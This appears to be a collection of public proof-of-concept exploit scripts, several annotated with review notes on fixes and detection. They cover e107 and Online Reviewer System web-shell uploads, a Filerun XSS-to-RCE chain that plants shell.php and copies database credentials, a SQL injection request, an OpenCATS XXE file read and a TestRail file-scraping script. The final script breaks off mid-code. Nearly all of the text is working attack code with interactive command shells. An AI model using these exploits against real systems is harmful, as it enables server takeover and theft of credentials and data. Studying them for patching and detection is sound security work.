host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] 
Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!") sleep(2) exit(1) else: check(args) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def check(args): response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami") if response.status_code == 200: print("[*] Exploit File Exists!\n") sleep(2) exploit(args) else: login(args) def login(args): url = args.host + "/e107_admin/admin.php" headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/admin.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"} response = requests.post(url, headers=headers, data=data, allow_redirects=False) new_cookie = response.cookies.get("MySi_cookieSID") if (response.headers.get("Location") == "admin.php?failed"): print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) exit(1) else: print("[+] Success Login...\n") sleep(2) install(args, new_cookie) def install(args, new_cookie): url = args.host + "/e107_admin/theme.php" cookies = { "MySi_cookieSID": new_cookie, "e107_tzOffset": "-180"} headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary", "User-Agent": "Mozilla/5.0 
(Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n" response = requests.post(url, headers=headers, 
cookies=cookies, data=data, allow_redirects=False) if (response.status_code == 301): print("[!] Unauthorized user!\n\n") print("Requires user with add theme permissions.") sleep(2) exit(1) else: print("[!] Upload Vuln File!\n") sleep(2) exploit(args) def exploit(args): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
  19. # Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated) # Date: 09/21/2021 # Exploit Author: syntegris information solutions GmbH # Credits: Christian P. # Vendor Homepage: https://filerun.com # Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t # Version: 2021.03.26 # Tested on: official docker image # PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution import requests import time import sys # this is the plain version of the payload below """ var xmlhttp = new XMLHttpRequest(); var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick' var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #"; xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == XMLHttpRequest.DONE) { if (xmlhttp.status == 200) { console.log(xmlhttp.responseText); } } }; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send("mode=exec&path=convert|"+payload); """ if not len(sys.argv) == 2: print("missing target url") sys.exit(1) target = sys.argv[1] def inject_code(): payload = 
"&#x76;&#x61;&#x72;&#x20;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x20;&#x3d;&#x20;&#x6e;&#x65;&#x77;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x28;&#x29;&#x3b;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x75;&#x72;&#x6c;&#x20;&#x3d;&#x20;&#x27;&#x2f;&#x3f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x3d;&#x63;&#x70;&#x61;&#x6e;&#x65;&#x6c;&&#x73;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x73;&#x65;&#x74;&#x74;&#x69;&#x6e;&#x67;&#x73;&&#x70;&#x61;&#x67;&#x65;&#x3d;&#x69;&#x6d;&#x61;&#x67;&#x65;&#x5f;&#x70;&#x72;&#x65;&#x76;&#x69;&#x65;&#x77;&&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x63;&#x68;&#x65;&#x63;&#x6b;&#x49;&#x6d;&#x61;&#x67;&#x65;&#x4d;&#x61;&#x67;&#x69;&#x63;&#x6b;&#x27;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x20;&#x3d;&#x20;"&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;<&#x3f;&#x70;&#x68;&#x70;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x5f;&#x52;&#x45;&#x51;&#x55;&#x45;&#x53;&#x54;&#x5b;&#x5c;&#x27;&#x63;&#x6d;&#x64;&#x5c;&#x27;&#x5d;&#x29;&#x3b;&#x20;&#x3f;>&#x27;&#x20;&#x20;>&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x2e;&#x70;&#x68;&#x70;&#x20;&#x23;"&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x6e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x73;&#x74;&#x61;&#x74;&#x65;&#x63;&#x68;&#x61;&#x6e;&#x67;&#x65;&#x20;&#x3d;&#x20;&#x66;&#x75;&#x6e;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x53;&#x74;&#x61;&#x74;&#x65;&#x20;&#x3d;&#x3d;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x44;&#x4f;&#x4e;&#x45;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x32;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20
;&#x63;&#x6f;&#x6e;&#x73;&#x6f;&#x6c;&#x65;&#x2e;&#x6c;&#x6f;&#x67;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x73;&#x70;&#x6f;&#x6e;&#x73;&#x65;&#x54;&#x65;&#x78;&#x74;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x34;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x54;&#x68;&#x65;&#x72;&#x65;&#x20;&#x77;&#x61;&#x73;&#x20;&#x61;&#x6e;&#x20;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x20;&#x34;&#x30;&#x30;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x73;&#x6f;&#x6d;&#x65;&#x74;&#x68;&#x69;&#x6e;&#x67;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x6f;&#x74;&#x68;&#x65;&#x72;&#x20;&#x74;&#x68;&#x61;&#x6e;&#x20;&#x32;&#x30;&#x30;&#x20;&#x77;&#x61;&#x73;&#x20;&#x72;&#x65;&#x74;&#x75;&#x72;&#x6e;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x7d;&#x0a;&#x7d;&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x70;&#x65;&#x6e;&#x28;"&#x50;&#x4f;&#x53;&#x54;"&#x2c;&#x20;&#x75;&#x72;&#x6c;&#x2c;&#x20;&#x74;&#x72;&#x75;&#x65;&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x74;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x48;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;"&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x2d;&#x54;&#x79;&#x70;&#x65;"&#x2c;&#x20;"&#x61;&#x70;&#x70;&#x6c;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x2f;&#x78;&#x2d;&#x77;&#x77;&#x77;&#x2d;&#x66;&#x6f;&#x72;&#x6d;&#x2d;&#x75;&#x72;&#x6c;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x64;"&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x6e;&#x64;&#x28;"&#x6d;&#x6f;&#x64;&#x65;&#x3d;&#x65;&#x78;&#x65;&#x63;
&&#x70;&#x61;&#x74;&#x68;&#x3d;&#x63;&#x6f;&#x6e;&#x76;&#x65;&#x72;&#x74;&#x7c;"&#x2b;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x29;&#x3b;&#x0a;" req = requests.post( "%s/?module=fileman&page=login&action=login" % target, data={'username': 'nonexistend', 'password': 'wrong', 'otp':'', 'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload} ) def check_shell_exists(): req = requests.get("%s/shell.php" % target) if req.status_code != 200: return False return True def process_command(command): req = requests.get("%s/shell.php?cmd=%s" % (target, command)) print(req.text) while True: print("Injecting new log message...") inject_code() time.sleep(10) if check_shell_exists(): print("Shell exists under '%s/shell.php?cmd=ls'" % target) break print("Lets get autoconfig.php which contains database credentials...") process_command("cp system/data/autoconfig.php js/autoconfig.txt") ac_resp = requests.get("%s/js/autoconfig.txt" % target) with open("filerun.autoconfig.php", "wb") as ac_f: ac_f.write(ac_resp.content) process_command("rm js/autoconfig.php") while True: command = input("Command:") process_command(command)
  20. # Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi # Exploit Author: ()t/\/\1 # Date: September 21, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html # Tested on: Linux # Version: v1.0 # Exploit Description: The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'employee_code' POST parameter in 'http://127.0.0.1//attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data. # PoC request POST /attendance/Actions.php?a=save_attendance HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/attendance/attendance.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 138 Connection: close Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In
# Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)
# Date: 2021-09-20
# Exploit Author: Jake Ruston
# Vendor Homepage: https://opencats.org
# Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip
# Version: < 0.9.4-3
# Tested on: Linux
# CVE: 2019-13358
#
# Reading notes (review): the script builds a minimal .docx whose
# word/document.xml carries a DOCTYPE with an external entity, submits it as a
# resume through the public careers page, and reads the expanded entity back
# out of the HTML response. Local side effects: it writes resume.docx and an
# extracted word/ directory into the current working directory.
# The server-side class of fix for this is to parse uploaded documents with
# external entity resolution disabled; per the header, builds before 0.9.4-3
# are affected.

from argparse import ArgumentParser
from docx import Document
from zipfile import ZipFile
from base64 import b64decode
import requests
import re

# Template for word/document.xml. The DOCTYPE declares an external entity
# `file` whose SYSTEM URI is a php://filter base64-encoding read of the
# resource named by the `{}` placeholder (filled by str.format in
# update_resume). The entity is referenced inside <w:t> between the literal
# START and END markers, which post() later uses to locate the result.
xml = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource={}'>]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
<w:body>
<w:p>
<w:r>
<w:t>START&file;END</w:t>
</w:r>
</w:p>
<w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
<w:pgSz w:w="12240" w:h="15840"/>
<w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
<w:cols w:space="720"/>
<w:docGrid w:linePitch="360"/>
</w:sectPr>
</w:body>
</w:document>
"""


class CVE_2019_13358:
    """Drive the four steps: parse args, build the document, find a job ID, submit.

    All HTTP goes to ``<url>/careers/index.php`` (see parse_arguments); the
    remote file name comes straight from ``--file`` and is only substituted
    into the template, never validated here.
    """

    def __init__(self):
        # Arguments are parsed eagerly so a bad command line fails before any
        # file is written to disk.
        self.args = self.parse_arguments()

    def parse_arguments(self):
        """Parse ``--url`` and ``--file`` and normalise the URL.

        Returns:
            The argparse namespace, with ``url`` rewritten to the careers
            endpoint (``http://`` is prepended when no scheme is given).
        """
        parser = ArgumentParser()
        required = parser.add_argument_group("required arguments")
        required.add_argument("--url", help="the URL where OpenCATS is hosted", required=True)
        required.add_argument("--file", help="the remote file to read", required=True)
        args = parser.parse_args()
        # Only the prefix "http" is checked, so "https://..." passes unchanged too.
        if not args.url.startswith("http"):
            args.url = f"http://{args.url}"
        args.url = f"{args.url}/careers/index.php"
        return args

    def create_resume(self):
        """Write a blank, valid ``resume.docx`` into the working directory."""
        document = Document()
        document.add_paragraph()
        document.save("resume.docx")

    def update_resume(self):
        """Replace word/document.xml in ``resume.docx`` with the XXE template.

        The zip is extracted into the working directory, the single XML part
        is overwritten with the filled template, and the archive is rewritten
        containing only ``word/document.xml`` (the other parts from
        create_resume are dropped).
        """
        with ZipFile("resume.docx", "r") as resume:
            resume.extractall()
        with open("word/document.xml", "w") as document:
            document.write(xml.format(self.args.file).strip())
        with ZipFile("resume.docx", "w") as resume:
            resume.write("word/document.xml")

    def get(self):
        """Fetch the public listing and return one job-order ID from it.

        Returns:
            The digit captured by the ``ID=`` regex (the group is inside the
            repetition, so at most one digit is captured).

        Raises:
            Exception: when the GET fails or no ``ID=`` is present.
        """
        params = {
            "m": "careers",
            "p": "showAll"
        }
        try:
            request = requests.get(self.args.url, params=params)
        except Exception as e:
            raise Exception("Failed to GET to the URL provided", e)
        # `id` shadows the builtin; it is the regex match object here.
        id = re.search(r"ID=([0-9])*", request.text)
        if id is None:
            raise Exception("No vacancies were found")
        return id.group(1)

    def post(self, id):
        """Submit ``resume.docx`` as an application and print the extracted file.

        Args:
            id: job-order ID returned by get().

        Raises:
            Exception: when the POST fails or the text between START/END does
                not base64-decode to ASCII (the bare ``except`` maps every
                decode error to "File not found").
        """
        params = {
            "m": "careers",
            "p": "onApplyToJobOrder"
        }
        # Multipart body; every form field is sent empty except the ID and the
        # file. The handle opened for "resumeFile" is never explicitly closed.
        files = {
            "ID": (None, id),
            "candidateID": (None, -1),
            "applyToJobSubAction": (None, "resumeLoad"),
            "file": (None, ""),
            "resumeFile": open("resume.docx", "rb"),
            "resumeContents": (None, ""),
            "firstName": (None, ""),
            "lastName": (None, ""),
            "email": (None, ""),
            "emailconfirm": (None, ""),
            "phoneHome": (None, ""),
            "phoneCell": (None, ""),
            "phone": (None, ""),
            "bestTimeToCall": (None, ""),
            "address": (None, ""),
            "city": (None, ""),
            "state": (None, ""),
            "zip": (None, ""),
            "keySkills": (None, "")
        }
        try:
            request = requests.post(self.args.url, params=params, files=files)
        except Exception as e:
            raise Exception("Failed to POST to the URL provided", e)
        # The server echoes the parsed document text back; the markers from the
        # template delimit the expanded entity. find() returns -1 when a marker
        # is absent, which is not checked before slicing.
        start = request.text.find("START")
        end = request.text.find("END")
        file = request.text[start + 5:end].strip()
        try:
            file = b64decode(file)
            file = file.decode("ascii").strip()
        except:
            raise Exception("File not found")
        print(file)

    def run(self):
        """Run the steps in order: build, patch, locate a job, submit."""
        self.create_resume()
        self.update_resume()
        id = self.get()
        self.post(id)


CVE_2019_13358().run()
# Exploit Title: Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control
# Date: 22/09/2022
# Exploit Author: Sick Codes & JohnJHacking (Sakura Samuraii)
# Vendor Homepage: https://www.gurock.com/testrail/
# Version: 7.2.0.3014 and below
# Tested on: macOS, Linux, Windows
# CVE : CVE-2021-40875
# Reference: https://johnjhacking.com/blog/cve-2021-40875/
CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
# Method 1
#!/bin/bash
# Author: sickcodes & johnjhacking
# Contact: https://twitter.com/sickcodes
# https://github.com/SakuraSamuraii/derailed
# Copyright: sickcodes (C) 2021
# License: GPLv3+
#
# Reading notes (review): the script walks a list of "<md5> <relative path>"
# pairs, requests each path under the target, and saves every response that
# does not contain one of two deny strings. Everything lands in ./output
# next to accessible.log. On the defender side, the signal is a burst of GETs
# for non-web assets (sql, config, txt) from one client; the fix is for the
# web server to refuse direct access to those paths.

# stop null byte error while curling
shopt -s nullglob

! [ "${1}" ] && { echo "No target was specified. ./script.sh 'https://target/'" && exit 1 ; }

# Base URL; no trailing-slash normalisation, so "${TARGET}/${SUFFIX}" may
# carry a double slash.
TARGET="${1}"

# The path list is fetched over the network at run time from a third-party
# raw GitHub URL with no pinning or integrity check — a supply-chain exposure
# for whoever runs this, since its contents drive every request below.
wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt

# Resolved before the cd below, so this points at the download in the
# original working directory.
FILE_LIST="${PWD}/files.md5.txt"

mkdir -p ./output
cd ./output

touch ./accessible.log

# option to get a fresh updated files.md5, if it comes in a future version
# curl "${TARGET}/files.md5" > ./files.md5

# Each line of files.md5 is "<hash> <path>"; only the path is used.
while read -r HASH SUFFIX; do
    echo "${SUFFIX}"
    TESTING_URL="${TARGET}/${SUFFIX}"
    echo "========= ${TESTING_URL} ========="
    # Ignore list, some of these files MAY be world readable,
    # if the organisation has modified permissions related
    # to the below files otherwise, they are ignored.
    case "${SUFFIX}" in
        *'.php' ) continue ;;
        *'.html' ) continue ;;
        *'LICENSE' ) continue ;;
        *'README.md' ) continue ;;
        *'.js' ) continue ;;
        *'.svg' ) continue ;;
        *'.gif' ) continue ;;
        *'.png' ) continue ;;
        *'.css' ) continue ;;
        *'.exe' ) continue ;;
        # *'.add_your_own' ) continue
        # ;;
    esac
    # peek at page response
    # doesn't work because gurock returns 200 and prints the error in plaintext
    # curl -s -I -X POST "${TESTING_URL}"
    # fetch the page, following redirects, to a variable
    # (-vvvv goes to stderr, so only the body is captured; the HTTP status is
    # never inspected, which is why the deny strings below are matched on
    # content instead)
    OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")"
    # find matching disqualifying phrases in the page contents
    # and pass any pages that are "denied access" or "direct script access"
    case "${OUTPUT_DATA}" in
        *'No direct script'* ) continue ;;
        *'Directory Listing Denied'* ) continue ;;
    esac
    # save all interesting pages, without forward slashes
    # https://www.target/
    # will be saved as:
    # https:::www.target:
    tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}"
    # print to stdout, and also append to ./accessible.log the successful saves
    tee -a ./accessible.log <<< "${TESTING_URL}"
done < "${FILE_LIST}"

### Results in your results folder you will have a few important files from the host, namely the initial SQL database insert statements with specific unique information pertaining to that server running Gurock Testrail 7.2.0.3014 and below
# Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 ORS_v1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/
#
# Reading notes (review): the script POSTs a multipart form to the question
# "add" action with a .php file in the image field, then talks to the stored
# file over GET. The only server-side control it relies on defeating is the
# upload filter; the durable fix is to validate uploads by an allow-list of
# types, rename them, and store them outside the web root so a stored file is
# never executed. For detection, the upload to btn_functions.php?action=add
# followed by GETs with a `cmd` query parameter is the visible pattern.

import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style

# TLS verification is turned off for every request below (verify=False).
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Online Reviewer System 1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
# Banner; the original line layout of the ASCII art is not recoverable here.
print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """)

GREEN = '\033[32m'  # Green Text
RED = '\033[31m'  # Red Text
RESET = '\033[m'  # reset to the defaults
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

#Create a new session
s = requests.Session()
#Set Cookie
# Fixed session id sent with the upload; presumably any value works since the
# header describes the endpoint as unauthenticated — not verified here.
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")


def webshell(LINK, session):
    """Interactive loop against the uploaded file.

    Args:
        LINK: base URL entered by the user.
        session: requests.Session used for the first probe only; the loop
            below uses the module-level ``requests.get`` (no session, no
            cookies).

    Reads the module-level ``filename`` at call time. The probe sends
    ``echo %CD%`` and expects a Windows drive-letter path in the reply
    (``[CDEF].*``) — consistent with the XAMPP/Windows test target in the
    header. Any exception, including KeyboardInterrupt, ends the process with
    exit code -1 via the bare ``except``.
    """
    try:
        WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename
        getdir = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        # cwd[0] raises IndexError when no drive-letter path is in the body;
        # that lands in the bare except below.
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell
# Multipart tuple: (filename, content, content-type, extra headers). The
# content type is client-chosen, so it carries no trust on the server side.
phpshell = {
    'personImage': (
        'kh4waja.php',
